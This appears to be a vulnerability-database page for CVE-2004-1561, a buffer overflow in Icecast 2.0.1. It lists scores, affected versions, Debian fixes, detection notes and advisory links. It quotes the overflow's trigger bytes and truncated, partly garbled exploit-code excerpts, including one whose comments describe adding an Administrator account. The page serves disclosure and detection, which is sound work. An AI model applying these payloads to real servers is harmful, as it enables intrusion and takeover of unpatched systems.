CVE-2004-1561
published 2004-12-31CVE-2004-1561: Buffer overflow in Icecast 2.0.1 and earlier allows remote attackers to execute arbitrary code via an HTTP request with a large number of headers.
PriorityP264high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
78.27%
99.5th percentile
Buffer overflow in Icecast 2.0.1 and earlier allows remote attackers to execute arbitrary code via an HTTP request with a large number of headers.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | icecast2 | < icecast2 2.0.2.debian-1 (bookworm) | icecast2 2.0.2.debian-1 (bookworm) |
| icecast | icecast | — | — |
| icecast | icecast | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xeb\x0c / HTTP/1.1 <payload>\r\n + 'Accept: text/html\r\n' * 31 + \xff\x64\x24\x04\r\n
bytes↗
\xeb\x0c (jmp 12) followed by \xff\x64\x24\x04 (jmp [esp+4])
- →Trigger condition is exactly 32 HTTP headers in a single request; the 32nd header overwrites the saved instruction pointer (one past end of pointer array). ↗
- →Exploit payload bad characters are \x0d, \x0a, and \x00 (CR, LF, NULL) — these bytes cannot appear in the HTTP header payload; detection signatures should account for alphanumeric-encoded shellcode. ↗
- →The exploit uses ExitThread() rather than ExitProcess(); a successfully exploited Icecast process will show a permanently elevated thread counter (threadpool never decremented) — monitor for threadpool exhaustion on port 8000. ↗
- →The Metasploit module uses EXITFUNC=thread; look for shellcode with a stack adjustment of -3500 bytes (\x81\xec) as a payload artifact in HTTP request bodies to port 8000. ↗
- →Exploit targets Icecast versions 2.0.1 and earlier on Windows x86; Linux builds are generally not exploitable due to stack layout differences. ↗
- ·The vulnerability is only reliably exploitable on Win32 builds of Icecast 2.0.1 and earlier; Linux builds are not considered exploitable due to differing compiler stack layouts. ↗
- ·Multi-hitting the exploit is possible but will progressively exhaust the Icecast threadpool; each successful payload exit permanently increments the thread counter. ↗
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv7.5HIGH
vendor_debian7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-jgqq-gwfm-cchw: Buffer overflow in Icecast 2
ghsa_unreviewed·2022-04-29
CVE-2004-1561 [HIGH] GHSA-jgqq-gwfm-cchw: Buffer overflow in Icecast 2
Buffer overflow in Icecast 2.0.1 and earlier allows remote attackers to execute arbitrary code via an HTTP request with a large number of headers.
OSV
CVE-2004-1561: Buffer overflow in Icecast 2
osv·2004-12-31·CVSS 7.5
CVE-2004-1561 [HIGH] CVE-2004-1561: Buffer overflow in Icecast 2
Buffer overflow in Icecast 2.0.1 and earlier allows remote attackers to execute arbitrary code via an HTTP request with a large number of headers.
Debian
CVE-2004-1561: icecast2 - Buffer overflow in Icecast 2.0.1 and earlier allows remote attackers to execute ...
vendor_debian·2004·CVSS 7.5
CVE-2004-1561 [HIGH] CVE-2004-1561: icecast2 - Buffer overflow in Icecast 2.0.1 and earlier allows remote attackers to execute ...
Buffer overflow in Icecast 2.0.1 and earlier allows remote attackers to execute arbitrary code via an HTTP request with a large number of headers.
Scope: local
bookworm: resolved (fixed in 2.0.2.debian-1)
bullseye: resolved (fixed in 2.0.2.debian-1)
forky: resolved (fixed in 2.0.2.debian-1)
sid: resolved (fixed in 2.0.2.debian-1)
trixie: resolved (fixed in 2.0.2.debian-1)
No detection rules found.
Exploit-DB
Icecast 2.0.1 (Windows x86) - Header Overwrite (Metasploit)
exploitdb·2010-04-30
CVE-2004-1561 Icecast 2.0.1 (Windows x86) - Header Overwrite (Metasploit)
Icecast 2.0.1 (Windows x86) - Header Overwrite (Metasploit)
---
##
# $Id: icecast_header.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Icecast ( %q{
This module exploits a buffer overflow in the header parsing
of icecast, discovered by Luigi Auriemma. Sending 32 HTTP
headers will cause a write one past the end of a pointer
array. On win32 this happens to overwrite the saved
instruction pointer, and on linux (depending on compiler,
etc) this seems to generally overwrite nothing crucial (read
not exploit
Exploit-DB
Icecast 2.0.1 (Win32) - Remote Code Execution (2)
exploitdb·2004-10-12
CVE-2004-1561 Icecast 2.0.1 (Win32) - Remote Code Execution (2)
Icecast 2.0.1 (Win32) - Remote Code Execution (2)
---
/*
ICECAST 2.0.1 WiN32 REMOTE EXPLOiT
by Luigi Auriemma
Modded by:
******* LORDKAOZ *********
*** OF IMPERATORI TEAM ***
Greetz to marc0z, m3nTe, DarKBad, OuT, FaX (Anche se non se lo merita), MeSSiA e eXpLoIt!
This exploit will add an Administrator account with USER: X AND PASSWORD: X
*/
#include
#include
#include
#ifdef WIN32
#include
#include "winerr.h"
#define close closesocket
#else
#include
#include
#include
#include
#include
#include
#endif
#define VER "0.1"
#define PORT 8000
#define BUFFSZ 2048
#define TIMEOUT 3
#define EXEC "GET / HTTP/1.0\r\n" \
"a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" \
"a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" \
"a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n"
Exploit-DB
Icecast 2.0.1 (Win32) - Remote Code Execution (1)
exploitdb·2004-10-06
CVE-2004-1561 Icecast 2.0.1 (Win32) - Remote Code Execution (1)
Icecast 2.0.1 (Win32) - Remote Code Execution (1)
---
/*
by Luigi Auriemma
Shellcode add-on by Delikon
www.Delikon.de
Because of all the forbidden bytes in a http get request
i had to use a very small shellcode, which was blown up
by Msf::Encoder::PexAlphaNum. Great encoder.
C:>iceexec 127.0.0.1
Icecast nc 127.0.0.1 9999
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:Icecast2 Win32>
*/
#include
#include
#include
#ifdef WIN32
#pragma comment(lib, "ws2_32.lib")
#include
#include "winerr.h"
#define close closesocket
#else
#include
#include
#include
#include
#include
#include
#endif
#define VER "0.1"
#define PORT 8000
#define BUFFSZ2048
#define TIMEOUT 3
#define EXEC"GET / HTTP/1.0rn"
"arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn"
"arn" "arn" "a
Metasploit
Icecast Header Overwrite
metasploit
Icecast Header Overwrite
Icecast Header Overwrite
This module exploits a buffer overflow in the header parsing of icecast versions 2.0.1 and earlier, discovered by Luigi Auriemma. Sending 32 HTTP headers will cause a write one past the end of a pointer array. On win32 this happens to overwrite the saved instruction pointer, and on linux (depending on compiler, etc) this seems to generally overwrite nothing crucial (read not exploitable). This exploit uses ExitThread(), this will leave icecast thinking the thread is still in use, and the thread counter won't be decremented. This means for each time your payload exits, the counter will be left incremented, and eventually the threadpool limit will be maxed. So you can multihit, but only till you fill the threadpool.
No writeups or analysis indexed.
http://aluigi.altervista.org/adv/iceexec-adv.txthttp://marc.info/?l=bugtraq&m=109640005127644&w=2http://marc.info/?l=bugtraq&m=109674593230539&w=2http://secunia.com/advisories/12666/http://securitytracker.com/id?1011439http://www.osvdb.org/10446http://www.securiteam.com/exploits/6X00315BFM.htmlhttp://www.securityfocus.com/bid/11271https://exchange.xforce.ibmcloud.com/vulnerabilities/17538http://aluigi.altervista.org/adv/iceexec-adv.txthttp://marc.info/?l=bugtraq&m=109640005127644&w=2http://marc.info/?l=bugtraq&m=109674593230539&w=2http://secunia.com/advisories/12666/http://securitytracker.com/id?1011439http://www.osvdb.org/10446http://www.securiteam.com/exploits/6X00315BFM.htmlhttp://www.securityfocus.com/bid/11271https://exchange.xforce.ibmcloud.com/vulnerabilities/17538
2004-12-31
Published